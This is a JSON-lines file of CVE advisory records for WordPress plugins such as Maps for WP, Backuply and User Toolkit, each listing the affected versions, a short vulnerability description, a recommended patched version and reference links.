{"CVE_ID":"CVE-2024-13648","slug":"maps-for-wp","versionImpact":"1.2.4","versionEndExcluding":"1.2.5","description":"The Maps for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'MapOnePoint' shortcode in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226414%40maps-for-wp&new=3226414%40maps-for-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226414%40maps-for-wp&new=3226414%40maps-for-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242174%40maps-for-wp&new=3242174%40maps-for-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242174%40maps-for-wp&new=3242174%40maps-for-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a16c8b5d-fd93-49b4-b1d7-f4cd9248aef3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a16c8b5d-fd93-49b4-b1d7-f4cd9248aef3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11764","slug":"solar-wizard-lite","versionImpact":"1.2.4","versionEndExcluding":"1.2.5","description":"The Solar Wizard Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'solar_wizard' shortcode in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215301%40solar-wizard-lite&new=3215301%40solar-wizard-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215301%40solar-wizard-lite&new=3215301%40solar-wizard-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adcab262-08ca-448d-b1fd-295d421b82a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adcab262-08ca-448d-b1fd-295d421b82a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13680","slug":"cp-easy-form-builder","versionImpact":"1.2.41","versionEndExcluding":"1.2.42","description":"The Form Builder CP plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'CP_EASY_FORM_WILL_APPEAR_HERE' shortcode in all versions up to, and including, 1.2.41 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.2.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-easy-form-builder\\\/tags\\\/1.2.41\\\/cp_easy_form_builder.php#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-easy-form-builder\\\/tags\\\/1.2.41\\\/cp_easy_form_builder.php#L297\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3214984%40cp-easy-form-builder&new=3214984%40cp-easy-form-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3214984%40cp-easy-form-builder&new=3214984%40cp-easy-form-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a018fcb1-b7a6-456f-ab0b-59ccc1fd5b67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a018fcb1-b7a6-456f-ab0b-59ccc1fd5b67?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6446","slug":"calculated-fields-form","versionImpact":"1.2.40","versionEndExcluding":"1.2.41","description":"The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.2.41, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c879123c-531e-43d8-a7d3-16a3c86b68a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c879123c-531e-43d8-a7d3-16a3c86b68a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3005354\\\/calculated-fields-form\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3005354\\\/calculated-fields-form\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1264","slug":"broken-link-checker-seo","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Broken Link Checker by AIOSEO \u2013 Easily Fix\/Monitor Internal and External links plugin for WordPress is vulnerable to SQL Injection via the 'orderBy' parameter in all versions up to, and including, 1.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/Api.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/Api.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/LinkStatusTable.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/LinkStatusTable.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L1357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L1357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L552\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L552\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263416%40broken-link-checker-seo&new=3263416%40broken-link-checker-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263416%40broken-link-checker-seo&new=3263416%40broken-link-checker-seo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broken-link-checker-seo\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broken-link-checker-seo\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2d582e-4f50-4b55-9f3b-3c46d96c0927?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2d582e-4f50-4b55-9f3b-3c46d96c0927?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11426","slug":"autolisticle-automatically-update-numbered-list-articles","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The AutoListicle: Automatically Update Numbered List Articles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'auto-list-number' shortcode in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/autolisticle-automatically-update-numbered-list-articles\\\/trunk\\\/autolisticle.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/autolisticle-automatically-update-numbered-list-articles\\\/trunk\\\/autolisticle.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194263%40autolisticle-automatically-update-numbered-list-articles&new=3194263%40autolisticle-automatically-update-numbered-list-articles&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194263%40autolisticle-automatically-update-numbered-list-articles&new=3194263%40autolisticle-automatically-update-numbered-list-articles&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75313c5-dbc9-4a33-898e-47d8fd299a42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75313c5-dbc9-4a33-898e-47d8fd299a42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12405","slug":"export-customers-data","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Export Customers Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 't' parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210666%40export-customers-data&new=3210666%40export-customers-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210666%40export-customers-data&new=3210666%40export-customers-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed61c037-a73c-477e-a5b5-3b4781cec130?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed61c037-a73c-477e-a5b5-3b4781cec130?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0697","slug":"backuply","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Backuply \u2013 Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2351","slug":"wpdirectorykit","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The WP Directory Kit plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'ajax_admin' function in versions up to, and including, 1.2.3. This makes it possible for authenticated attackers with subscriber-level permissions or above to delete or change plugin settings, import demo data, delete Directory Kit related posts and terms, and install arbitrary plugins. A partial patch was introduced in version 1.2.0.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2917413%40wpdirectorykit&new=2917413%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2917413%40wpdirectorykit&new=2917413%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905046%40wpdirectorykit&new=2905046%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905046%40wpdirectorykit&new=2905046%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2907164%40wpdirectorykit&new=2907164%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2907164%40wpdirectorykit&new=2907164%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50c5154c-1573-4c2b-85a1-a89bdb22dc7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50c5154c-1573-4c2b-85a1-a89bdb22dc7d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905795%40wpdirectorykit&new=2905795%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905795%40wpdirectorykit&new=2905795%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9890","slug":"user-toolkit","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The User Toolkit plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2.3. This is due to an improper capability check in the 'switchUser' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/805f18e2-9a5a-48cf-81f4-825da4bfd8ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/805f18e2-9a5a-48cf-81f4-825da4bfd8ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-toolkit\\\/tags\\\/1.2.3\\\/src\\\/UserSwitch.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-toolkit\\\/tags\\\/1.2.3\\\/src\\\/UserSwitch.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175190\\\/user-toolkit#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175190\\\/user-toolkit#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2527","slug":"cf7-zoho","versionEndExcluding":"1.2.4","description":"The Integration for Contact Form 7 and Zoho CRM, Bigin WordPress plugin before 1.2.4 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8051142a-4e55-4dc2-9cb1-1b724c67574f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8051142a-4e55-4dc2-9cb1-1b724c67574f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3481","slug":"counter-box","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Counter Box  WordPress plugin before 1.2.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such deleting counters via CSRF attacks","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0c441293-e7f9-4634-8f3a-09925cd2b696\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0c441293-e7f9-4634-8f3a-09925cd2b696\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5029","slug":"cm-table-of-content","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The CM Table Of Contents  WordPress plugin before 1.2.4 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0f4a33c-9dd2-45ee-82e7-4b8bc2c20094\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0f4a33c-9dd2-45ee-82e7-4b8bc2c20094\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5641","slug":"martins-link-network","versionImpact":"1.2.29","versionEndExcluding":"1.2.30","description":"The Martins Free & Easy SEO BackLink Link Building Network WordPress plugin before 1.2.30 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.2.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0a6c253-71f2-415d-a6ec-022f2eafc13b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0a6c253-71f2-415d-a6ec-022f2eafc13b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5762","slug":"filr-protection","versionEndExcluding":"1.2.3.6","description":"The Filr WordPress plugin before 1.2.3.6 is vulnerable from an RCE (Remote Code Execution) vulnerability, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges.","recommendation":"Update to version 1.2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ad99725-eccc-4b61-bce2-668b62619deb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ad99725-eccc-4b61-bce2-668b62619deb\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13401","slug":"wp-paypal","versionImpact":"1.2.3.35","versionEndExcluding":"1.2.3.36","description":"The Payment Button for PayPal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_paypal_checkout' shortcode in all versions up to, and including, 1.2.3.35 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/main.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/main.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/wp-paypal-checkout.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/wp-paypal-checkout.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223257%40wp-paypal&new=3223257%40wp-paypal&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223257%40wp-paypal&new=3223257%40wp-paypal&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20fc675c-08a4-4d77-9872-335d23146906?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20fc675c-08a4-4d77-9872-335d23146906?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0239","slug":"ari-cf7-connector","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Contact Form 7 Connector WordPress plugin before 1.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9a4a3e3-7cdd-4354-8541-4219bd41c854\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9a4a3e3-7cdd-4354-8541-4219bd41c854\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10782","slug":"theme-builder-for-elementor","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Theme Builder For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.2 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187424%40theme-builder-for-elementor&new=3187424%40theme-builder-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187424%40theme-builder-for-elementor&new=3187424%40theme-builder-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73ad8840-b60f-4a92-b1c9-0996f78ab6b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73ad8840-b60f-4a92-b1c9-0996f78ab6b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4757","slug":"ldap-ad-staff-employee-directory-search","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Staff \/ Employee Business Directory for Active Directory WordPress plugin before 1.2.3 does not sanitize and escape data returned from the LDAP server before rendering it in the page, allowing users who can control their entries in the LDAP directory to inject malicious javascript which could be used against high-privilege users such as a site admin.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b953413-cf41-4de7-ac1f-c6cb995fb158\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b953413-cf41-4de7-ac1f-c6cb995fb158\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8427","slug":"frontend-post-submission-manager-lite","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Frontend Post Submission Manager Lite \u2013 Frontend Posting WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_global_settings and process_form_edit functions in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings and forms.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84b68b6-1ce8-45fb-823f-a61158aa4d21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84b68b6-1ce8-45fb-823f-a61158aa4d21?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147218\\\/frontend-post-submission-manager-lite\\\/trunk\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147218\\\/frontend-post-submission-manager-lite\\\/trunk\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-post-submission-manager-lite\\\/tags\\\/1.2.2\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-post-submission-manager-lite\\\/tags\\\/1.2.2\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47191","slug":"youzify","versionEndExcluding":"1.2.3","description":"Authorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress.This issue affects Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n\/a through 1.2.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/youzify\\\/wordpress-youzify-plugin-1-2-2-insecure-direct-object-reference-idor-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/youzify\\\/wordpress-youzify-plugin-1-2-2-insecure-direct-object-reference-idor-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4833","slug":"yourchannel","versionEndExcluding":"1.2.3","description":"The YourChannel: Everything you want in a YouTube plugin WordPress plugin before 1.2.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35ba38cf-4f23-4344-8de3-cf3004ebf84c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35ba38cf-4f23-4344-8de3-cf3004ebf84c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
